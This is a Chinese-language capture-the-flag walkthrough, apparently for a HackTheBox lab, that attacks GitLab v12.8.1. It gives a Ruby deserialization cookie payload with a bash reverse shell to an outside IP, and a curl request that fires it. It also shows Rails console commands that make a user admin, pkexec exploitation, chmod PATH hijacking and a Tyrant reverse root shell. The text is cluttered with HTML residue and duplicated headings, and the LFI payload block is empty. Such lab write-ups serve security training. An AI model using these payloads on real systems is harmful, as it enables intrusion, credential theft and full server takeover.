GitLab v12.8.1 渗透测试全流程教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 目标识别<\/h3>

目标IP: 10.10.10.216<\/li>

开放端口:

22 (SSH)<\/li>
80 (HTTP)<\/li>

443 (HTTPS)<\/li> <\/ul> <\/li> <\/ul>

1.2 主机发现与端口扫描<\/h3>

使用以下命令进行扫描：<\/p>

ip=<\/span>'10.10.10.216'<\/span>; itf=<\/span>'tun0'<\/span>
<\/span><\/span>if<\/span> nmap -Pn -sn "<\/span>$ip"<\/span> | grep -q "Host is up"<\/span>; then<\/span>
<\/span><\/span>  echo -e "\e[32m[+] Target <\/span>$ip is up, scanning ports...\e[0m"<\/span>
<\/span><\/span>  ports=<\/span>$(<\/span>sudo masscan -p1-65535,U:1-65535 "<\/span>$ip"<\/span> --rate=<\/span>1000<\/span> -e "<\/span>$itf"<\/span> | awk '\/open\/ {print $4}'<\/span> | cut -d '\/'<\/span> -f1 | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>
<\/span><\/span>  if<\/span> [<\/span> -n "<\/span>$ports"<\/span> ]<\/span>; then<\/span>
<\/span><\/span>    echo -e "\e[34m[+] Open ports found on <\/span>$ip: <\/span>$ports\e[0m"<\/span>
<\/span><\/span>    nmap -Pn -sV -sC -p "<\/span>$ports"<\/span> "<\/span>$ip"<\/span>
<\/span><\/span>  else<\/span>
<\/span><\/span>    echo -e "\e[31m[!] No open ports found on <\/span>$ip.\e[0m"<\/span>
<\/span><\/span>  fi<\/span>
<\/span><\/span>else<\/span>
<\/span><\/span>  echo -e "\e[31m[!] Target <\/span>$ip is unreachable, network is down.\e[0m"<\/span>
<\/span><\/span>fi<\/span>
<\/span><\/span><\/code><\/pre>1.3 服务识别<\/h3>

SSH: OpenSSH 8.2p1 Ubuntu 4ubuntu0.1<\/li>
HTTP: Apache httpd 2.4.41<\/li>
HTTPS: Apache httpd 2.4.41 with SSL证书

证书信息:

CommonName: laboratory.htb<\/li>
Subject Alternative Name: DNS:git.laboratory.htb<\/li>
有效期: 2020-07-05 至 2024-03-03<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
<\/ul>
2. 初始访问<\/h2>
2.1 添加主机记录<\/h3>
echo '10.10.10.216 laboratory.htb git.laboratory.htb'<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>2.2 访问Web服务<\/h3>

主站点: https:\/\/laboratory.htb\/<\/li>
GitLab站点: https:\/\/git.laboratory.htb\/users\/sign_in<\/li>
<\/ul>
2.3 注册用户<\/h3>
在GitLab站点注册一个新用户并登录<\/p>
3. GitLab v12.8.1 LFI漏洞利用<\/h2>
3.1 创建项目<\/h3>

创建两个项目: A和B<\/li>
在项目A的issues中添加以下内容:<\/li>
<\/ol>

<\/code><\/pre>

将此issue移动到项目B中<\/li>
<\/ol>
3.2 漏洞原理<\/h3>
利用GitLab v12.8.1的文件上传路径处理不当漏洞，通过精心构造的路径实现本地文件包含(LFI)<\/p>
4. Ruby反序列化RCE<\/h2>
4.1 准备GitLab环境<\/h3>
wget https:\/\/packages.gitlab.com\/gitlab\/gitlab-ce\/packages\/ubuntu\/xenial\/gitlab-ce_12.8.1-ce.0_amd64.deb
<\/span><\/span>gitlab-ctl reconfigure
<\/span><\/span>gitlab-ctl restart
<\/span><\/span><\/code><\/pre>4.2 生成恶意cookie<\/h3>
gitlab-<\/span>rails console
<\/span><\/span>request =<\/span> ActionDispatch<\/span>::<\/span>Request<\/span>.<\/span>new(Rails<\/span>.<\/span>application.<\/span>env_config)
<\/span><\/span>request.<\/span>env[<\/span>"action_dispatch.cookies_serializer"<\/span>]<\/span> =<\/span> :marshal<\/span>
<\/span><\/span>erb =<\/span> ERB<\/span>.<\/span>new("<%= bash -c 'bash -i>& \/dev\/tcp\/10.10.16.31\/10032 0>&1' %>"<\/span>)
<\/span><\/span>depr =<\/span> ActiveSupport<\/span>::<\/span>Deprecation<\/span>::<\/span>DeprecatedInstanceVariableProxy<\/span>.<\/span>new(erb,:result<\/span>, "@result"<\/span>, ActiveSupport<\/span>::<\/span>Deprecation<\/span>.<\/span>new)
<\/span><\/span>cookies =<\/span> request.<\/span>cookie_jar
<\/span><\/span>cookies.<\/span>signed[<\/span>:cookie<\/span>]<\/span> =<\/span> depr
<\/span><\/span>puts cookies[<\/span>:cookie<\/span>]<\/span>
<\/span><\/span><\/code><\/pre>4.3 触发RCE<\/h3>
curl -vvv 'https:\/\/git.laboratory.htb\/users\/sign_in'<\/span> -k -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kidCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBiYXNoIC1jICdiYXNoIC1pPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjIvNDQ0NCAwPiYxJ2AgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OglAdmFySSIMQHJlc3VsdAY7ClQ6EEBkZXByZWNhdG9ySXU6H0FjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uAAY7ClQ=- -8fdb57c5b65cef79b38c842cc0a42570ff756636"<\/span>
<\/span><\/span><\/code><\/pre>5. 横向移动<\/h2>
5.1 提升权限为管理员<\/h3>
gitlab-<\/span>rails console
<\/span><\/span>users =<\/span> User<\/span>.<\/span>all
<\/span><\/span>users.<\/span>each do<\/span> |<\/span>user|<\/span>
<\/span><\/span>  puts "ID: <\/span>#{<\/span>user.<\/span>id}<\/span>, Username: <\/span>#{<\/span>user.<\/span>username}<\/span>, Email: <\/span>#{<\/span>user.<\/span>email}<\/span>, Encrypted Password: <\/span>#{<\/span>user.<\/span>encrypted_password}<\/span>"<\/span>
<\/span><\/span>end<\/span>
<\/span><\/span>
<\/span><\/span>user =<\/span> User<\/span>.<\/span>find_by(username<\/span>: 'map'<\/span>)
<\/span><\/span>user.<\/span>admin =<\/span> true<\/span>
<\/span><\/span>user.<\/span>save!
<\/span><\/span><\/code><\/pre>5.2 访问敏感数据<\/h3>

浏览项目: https:\/\/git.laboratory.htb\/explore<\/li>
获取SSH私钥: https:\/\/git.laboratory.htb\/dexter\/securedocker\/-\/blob\/master\/dexter\/.ssh\/id_rsa<\/li>
<\/ul>
5.3 获取user flag<\/h3>
9c2a8cd5962ffcbf1f56cd3ec5e6fde8
<\/code><\/pre>
6. 权限提升(TRP00F)<\/h2>
6.1 使用TRP00F工具<\/h3>
python3 trp00f.py --lhost 10.10.16.25 --lport 10000<\/span> --rhost 10.10.16.25 --rport 10032<\/span> --http 9999<\/span>
<\/span><\/span><\/code><\/pre>选择利用pkexec漏洞(y)<\/p>
6.2 路径劫持<\/h3>

监听端口:<\/li>
<\/ol>
nc 10.10.16.31 10011<\/span> <\/usr\/local\/bin\/docker-security
<\/span><\/span><\/code><\/pre>
创建恶意chmod脚本:<\/li>
<\/ol>
echo '#!\/bin\/bash\n\/bin\/bash'<\/span> > \/tmp\/chmod
<\/span><\/span>export PATH=<\/span>\/tmp:$PATH
<\/span><\/span><\/code><\/pre>
执行docker-security触发路径劫持<\/li>
<\/ol>
6.3 使用Tyrant进行持久化<\/h3>

上传Tyrant工具<\/li>
设置环境:<\/li>
<\/ol>
echo '\/tmp\/tyrant'<\/span>>\/tmp\/chmod
<\/span><\/span>\/usr\/bin\/chmod +x chmod
<\/span><\/span>\/usr\/bin\/chmod +x tyrant
<\/span><\/span>export PATH=<\/span>\/tmp:$PATH
<\/span><\/span>\/usr\/local\/bin\/docker-security
<\/span><\/span><\/code><\/pre>
获取root shell:<\/li>
<\/ol>
.\/tyrant -uid 0<\/span> -rhost 10.10.16.31 -rport 4451<\/span>
<\/span><\/span><\/code><\/pre>6.4 获取root flag<\/h3>
07456541386c4c220bac22b424b00f3b
<\/code><\/pre>
7. 技术要点总结<\/h2>


LFI漏洞利用<\/strong>:<\/p>

利用GitLab文件上传路径处理不当<\/li>
通过移动issue触发漏洞<\/li>
<\/ul>
<\/li>

Ruby反序列化RCE<\/strong>:<\/p>

利用ActionDispatch::Request和ActiveSupport::Deprecation组件<\/li>
通过恶意cookie触发反序列化<\/li>
<\/ul>
<\/li>

横向移动技术<\/strong>:<\/p>

通过GitLab Rails控制台修改用户权限<\/li>
访问内部项目获取敏感信息<\/li>
<\/ul>
<\/li>

权限提升技术<\/strong>:<\/p>

TRP00F工具利用pkexec漏洞<\/li>
路径劫持技术<\/li>
使用Tyrant进行持久化控制<\/li>
<\/ul>
<\/li>

防御规避<\/strong>:<\/p>

使用环境变量PATH劫持<\/li>
通过合法二进制文件执行恶意代码<\/li>
<\/ul>
<\/li>
<\/ol>

GitLab v12.8.1 渗透测试全流程教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. 初始访问<\/h2>

2.3 注册用户<\/h3> 在GitLab站点注册一个新用户并登录<\/p>

3. GitLab v12.8.1 LFI漏洞利用<\/h2>

3.2 漏洞原理<\/h3> 利用GitLab v12.8.1的文件上传路径处理不当漏洞，通过精心构造的路径实现本地文件包含(LFI)<\/p>

4. Ruby反序列化RCE<\/h2>

5. 横向移动<\/h2>

6. 权限提升(TRP00F)<\/h2>

2.3 注册用户<\/h3>
在GitLab站点注册一个新用户并登录<\/p>

3.2 漏洞原理<\/h3>
利用GitLab v12.8.1的文件上传路径处理不当漏洞，通过精心构造的路径实现本地文件包含(LFI)<\/p>